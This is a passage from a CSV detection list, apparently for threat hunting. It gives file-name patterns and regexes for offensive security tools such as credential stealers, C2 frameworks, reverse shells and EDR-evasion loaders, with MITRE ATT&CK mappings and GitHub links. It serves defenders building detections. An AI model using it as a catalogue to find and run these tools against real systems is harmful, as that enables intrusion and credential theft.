Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "*\Check-VM.ps1*",".{0,1000}\\Check\-VM\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\cheetah.py*",".{0,1000}\\cheetah\.py.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*\cheetah-master.zip*",".{0,1000}\\cheetah\-master\.zip.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*\chimera.py*",".{0,1000}\\chimera\.py.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*\Chimera-main\*",".{0,1000}\\Chimera\-main\\.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\chisel.exe*",".{0,1000}\\chisel\.exe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\chisel\client\*",".{0,1000}\\chisel\\client\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\chisel\server\*",".{0,1000}\\chisel\\server\\.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\chisel_x32*",".{0,1000}\\chisel_x32.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*\chisel_x64*",".{0,1000}\\chisel_x64.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*\chisel-master*",".{0,1000}\\chisel\-master.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*\Chrome_pass.db*",".{0,1000}\\Chrome_pass\.db.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*\ChromeKatz.sln*",".{0,1000}\\ChromeKatz\.sln.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*\chromepasswordlist.csv*",".{0,1000}\\chromepasswordlist\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\chromepasswords.py*",".{0,1000}\\chromepasswords\.py.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\chromium\getCredschromium.h*",".{0,1000}\\chromium\\getCredschromium\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\chromium_based_browsers.py*",".{0,1000}\\chromium_based_browsers\.py.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*\CIMplant.exe*",".{0,1000}\\CIMplant\.exe.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*\cleantracks.ps1",".{0,1000}\\cleantracks\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\CleanTracks.ps1*",".{0,1000}\\CleanTracks\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\clipboard.ps1*",".{0,1000}\\clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Clipboard.ps1*",".{0,1000}\\Clipboard\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\ClipboardMITM.py*",".{0,1000}\\ClipboardMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*\CloakNDaggerC2*",".{0,1000}\\CloakNDaggerC2.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","11","2","2024-04-26T19:45:06Z","2023-04-28T01:58:18Z" "*\cloud_enum.py*",".{0,1000}\\cloud_enum\.py.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1476","217","2024-05-01T10:26:56Z","2019-05-31T09:14:05Z" "*\cme.exe* -d * -u * -H *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-H\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\cme.exe* -d * -u * -p *",".{0,1000}\\cme\.exe.{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\cme.exe* --shares*",".{0,1000}\\cme\.exe.{0,1000}\s\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*\CMLoot.ps1*",".{0,1000}\\CMLoot\.ps1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*\code_exec.ps1*",".{0,1000}\\code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\codeloader.exe*",".{0,1000}\\codeloader\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*\CoercedPotato.cpp*",".{0,1000}\\CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*\coercer.exe*",".{0,1000}\\coercer\.exe.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*\Coercer.py*",".{0,1000}\\Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*\COFFLoader.exe*",".{0,1000}\\COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*\combine.exe*",".{0,1000}\\combine\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\combine_gui.exe*",".{0,1000}\\combine_gui\.exe.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","106","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z" "*\COMHijackToolkit.ps1*",".{0,1000}\\COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMHijackToolkit\*",".{0,1000}\\COMHijackToolkit\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COM-Hunter.csproj*",".{0,1000}\\COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*\COM-Hunter.exe*",".{0,1000}\\COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*\COM-Hunter.sln*",".{0,1000}\\COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*\COMInject.exe*",".{0,1000}\\COMInject\.exe.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMInject.sln*",".{0,1000}\\COMInject\.sln.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMInjectTarget.cpp*",".{0,1000}\\COMInjectTarget\.cpp.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMInjectTarget.dll*",".{0,1000}\\COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\COMInjectTarget\*",".{0,1000}\\COMInjectTarget\\.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "*\Command Reciever.exe*",".{0,1000}\\Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\command\exec\sideload.go*",".{0,1000}\\command\\exec\\sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\command\exec\spawndll.go*",".{0,1000}\\command\\exec\\spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\command_exec.exe*",".{0,1000}\\command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\commands\CameraScreenShot.cs*",".{0,1000}\\commands\\CameraScreenShot\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\common_pass.txt*",".{0,1000}\\common_pass\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*\COM-Object-hijacking-master*",".{0,1000}\\COM\-Object\-hijacking\-master.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","8","1","55","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z" "*\CompressArchiveCommand.cs",".{0,1000}\\CompressArchiveCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\ComunicationC2.cpp*",".{0,1000}\\ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*\CONCRETE_STEEL.exe""*",".{0,1000}\\CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*\Configure-Server.psm1*",".{0,1000}\\Configure\-Server\.psm1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Configure-Victim.ps1*",".{0,1000}\\Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\Configure-Victim.ps1*",".{0,1000}\\Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\ConfuserEx.exe*",".{0,1000}\\ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense 